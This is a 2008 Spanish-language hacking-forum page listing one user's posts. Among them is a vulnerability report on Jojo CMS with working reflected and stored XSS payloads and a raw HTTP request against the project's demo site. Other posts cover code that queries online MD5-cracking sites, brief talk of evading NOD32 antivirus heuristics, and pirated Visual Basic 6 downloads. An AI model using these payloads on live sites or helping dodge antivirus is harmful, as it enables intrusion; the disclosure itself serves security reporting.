elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12
61  Seguridad Informática / Nivel Web / [UP] Jojo cms XSS y FPD en: 12 Noviembre 2008, 20:56 pm
es un cms que recien esta naciendo, pero como no me contestaron lo publico:


Nombre: Jojo cms
Web: http://www.jojocms.org/
Version: 1.0 rc1
Reporte: http://bugs.jojocms.org/details/task134
Fecha de reporte: Wednesday, 05 November 2008, 12:52 UTC+13:00
Parcheado: no
Tipo de vulnerabilidad: XSS y FPD

Cross site scripting (non-persistent) and Full path disclosure:
http://demo.jojocms.org/search/%3Cscript%3Ealert(%22wopa!%22)%3C/script%3E

Cross site scripting (persistent):
http://demo.jojocms.org/blog/1/welcome-to-jojocms/


HTTP HEADERS (I injected in 'name' variable):
Código:
POST /blog/1/welcome-to-jojocms/ HTTP/1.1
Host: demo.jojocms.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://demo.jojocms.org/blog/1/welcome-to-jojocms/
Cookie: jojo=6cc641e1381c3201206cacfc9ce448ab; utma=119248274.775642559681182300.1225930562.1225930562.1225930562.1; utmb=119248274.1.10.1225930562; utmc=119248274; utmz=119248274.1225930562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
userid=&name=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&email=asd%40asd.asd&website=http%3A%2F%2Fasd.net&anchortext=asd&captchacode=fhq&comment=asdsad&submit=Post+Comment+%3E%3E
RESULT:

Código:
<div class="comment" id="article-comment-wrap-2">

<h4><a href="http://asd.net" target="new" rel="nofollow"><script>alert("XSS")</script></a><span class="date"> - Nov 5, 2008</span></h4>
<p id="article-comment-2" class="comment-text">asdsad</p>
</div>
</div>

sorry, my english is not good :(
62  Programación / Programación Visual Basic / Re: duda con el control inet en: 12 Noviembre 2008, 19:48 pm
quiero que el inet entre a una web, como x ejemplo http://md5.hashcracking.com/search.php?md5=21232f297a57a5a743894a0e4a801fc3 (a veces los datos hay que mandarlos por post). Y que de ahi saque el resultado qeu me da la web, para hacer esto yo ya se que hay antes y despues del resultado (por ejemplo, en esta antes hay "Cleartext of 21232f297a57a5a743894a0e4a801fc3 is " y despues nada)


edit:
una parte de donde saque la idea (perl)

Código
  1. #busca en www.milw0rm.com/cracker
  2. sub cracker2 {
  3. $hash=shift(@_);
  4. $agent=shift(@_);
  5. my $url = "http://milw0rm.com/cracker/search.php";
  6. my $conexion = LWP::UserAgent->new();
  7. $conexion->agent($agent);
  8. my $resultado = $conexion->get($url);
  9.  
  10. my $request = $conexion->post($url, ["hash" => $hash, "Submit" => "Submit"]); 
  11. my $content = $request->content; 
  12.  
  13. my $code1 = "</TD><TD align=\"middle\" nowrap=\"nowrap\" width=90>";
  14. my $code2 = "</TD><TD align=\"middle\" nowrap=\"nowrap\" width=90>cracked</TD></TR>";
  15. print "milw0rm.com          |   ";
  16. if ($request->content =~ m/$code1(.*)$code2/) {
  17. print "Cracked: $1\n";
  18. } else {
  19. print "Not Found\n";
  20. }
  21. }


edit2:
la primera ya funciono, tenia un error en
Código:
If Despues = "" Then
    A(1) = 0
Else
    A(1) = InStr(1, Datos, Despues)
End If
iba
Código:
If Despues = "" Then
    A(1) = Len(Datos)
Else
    A(1) = InStr(1, Datos, Despues)
End If
63  Programación / Programación Visual Basic / duda con el control inet en: 12 Noviembre 2008, 03:24 am
estoy haciendo una aplicacion de esas que buscan hashes crackeados por internet, pero al intentar buscar el hash (parecido a como lo vi en perl) en una web, no consigo obtener el html normalmente.

Código
  1. Public Function BuscarHash(Web As String, PostData As String, Antes As String, Despues As String) As String
  2. Dim A(1) As Long
  3. Dim Indice As Integer
  4. Dim Resultado As String
  5.  
  6. Indice = Crackeando
  7.  
  8.  
  9. If PostData = "" Then
  10.     frmMain.Net(Indice).Execute Web, "GET"
  11. Else
  12.     frmMain.Net(Indice).Execute Web, "POST", PostData
  13. End If
  14.  
  15.  
  16.  
  17.  'Datos parciales
  18. Dim d_Chunk As Variant
  19.  ' En esta variable se almacenan los datos finales
  20. Dim Datos As String
  21.  
  22. Do
  23.     DoEvents
  24. Loop While frmMain.Net(Indice).StillExecuting = True
  25.  
  26.              d_Chunk = frmMain.Net(Indice).GetChunk(1024, icString)
  27.              Datos = d_Chunk
  28.        Do
  29.              DoEvents
  30.              ' Recupera una porción de datos de 1024 bytes
  31.              d_Chunk = frmMain.Net(Indice).GetChunk(1024, icString)
  32.  
  33.              ' Si ya no hay mas sale
  34.             If Len(d_Chunk) = 0 Then
  35.                 Exit Do
  36.             Else
  37.                Datos = Datos & d_Chunk
  38.             End If
  39.        Loop
  40.  
  41. If Antes = "" Then
  42.     A(0) = 0
  43. Else
  44.     A(0) = InStr(1, Datos, Antes)
  45. End If
  46.  
  47. If Despues = "" Then
  48.     A(1) = 0
  49. Else
  50.     A(1) = InStr(1, Datos, Despues)
  51. End If
  52.  
  53. Resultado = Mid(Datos, A(0) + Len(Antes), A(1) - A(0))
  54.  
  55. BuscarHash = Resultado
  56.  
  57. End Function
  58.  

y lo llamo asi:
Código
  1.     Me.tvHashes.Nodes.Add "HH" & Crackeando, tvwChild, "HHH1" & I, "md5.hashcracking.com: " & BuscarHash("http://md5.hashcracking.com/search.php?md5=" & Lista(Crackeando).Valor, "", "Cleartext of " & Lista(Crackeando).Valor & "  is ", "")
  2.     Me.tvHashes.Nodes.Add "HH" & Crackeando, tvwChild, "HHH2" & I, "md5decryption.com: " & BuscarHash("http://md5decryption.com/", "hash=21232f297a57a5a743894a0e4a801fc3&submit=Decrypt+It%21", "<br><b class=""red"">Normal Text: </b>", "<br><script type=""text/javascript""><!--")
  3.  

pero nunca llego a tener la web en Datos :S

alguna ayuda?
64  Programación / Programación Visual Basic / Re: dibujar una elipse punto a punto en: 11 Noviembre 2008, 02:02 am
usa objeto.circle

ejemplo recien hecho (me tuve que fijar como se usaba circle xq nunca lo habia usado XD):
Código
  1. Private Sub Form_Paint()
  2. Dim i(2) As Long
  3. Me.WindowState = 2
  4. Do
  5. DoEvents
  6. Randomize Timer
  7. i(0) = Rnd * 9000
  8. Randomize Timer
  9. i(1) = Rnd * 9000
  10. Randomize Timer
  11. i(2) = Rnd * 9000
  12.  
  13. Me.Circle (i(0), i(1)), i(2)
  14. DoEvents
  15. Loop
  16. End Sub
65  Programación / Programación Visual Basic / Re: Visual Basic 6 | full | en español | 1 link | descarga directa en: 10 Noviembre 2008, 22:27 pm
el .isz es la imagen de disco, grabala con ultraiso o algun soft similar
66  Programación / Programación Visual Basic / Re: Visual Basic 6 | full | en español | 1 link | descarga directa en: 7 Noviembre 2008, 21:24 pm
subilo directo.. p2p es lento y rapidshare tambien... algun host gratis pero que te deje bajar bien

es la msdn completa o solo la parte de vb6? cualquiera de las dos me la bajo si la subis
67  Programación / Programación Visual Basic / Re: como salto heuristica de nod32 en: 7 Noviembre 2008, 21:19 pm
lo de tipos de compilacion buscalo en el indice en un tema que es sobre aplicaciones (parte 2)

basicamente es que p-code no esta compilado del todo
68  Programación / Programación Visual Basic / Re: como salto heuristica de nod32 en: 6 Noviembre 2008, 01:54 am
Cita de: vivachapas en  6 Noviembre 2008, 00:01 am
mmm donde lo analisaste? es probable a ahora todos lo detecten XD

no creo, eso es novirusthanks
69  Programación / Programación Visual Basic / Re: Visual Basic 6 | full | en español | 1 link | descarga directa en: 6 Noviembre 2008, 01:52 am
Código:
lkaj8927o3ñldl-.ase,lñQ"U(·L!"·$%
70  Programación / Programación Visual Basic / Re: Uso del for para 'analizar' frases (><) en: 6 Noviembre 2008, 01:52 am
usando instr se puede, de esta manera:

Citar
usamos una variable para determinar desde donde buscamos, la inicializamos a 0 para que empiece a buscar desde el principio
empieza el bucle
    busca con instr DESDE LA POSICION DE LA VARIABLE
    si instr dio resultados:
         la variable pasa a tener de valor la posicion de la cadena +1
    si no
          sale del bucle, la cadena no esta mas
vuelve al comienzo


o si no, podes hacer algo asi:
Código:
For i = 1 To Len(Text1.Text)
MsgBox Mid(Text1, i, len("10021"))
Next i
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines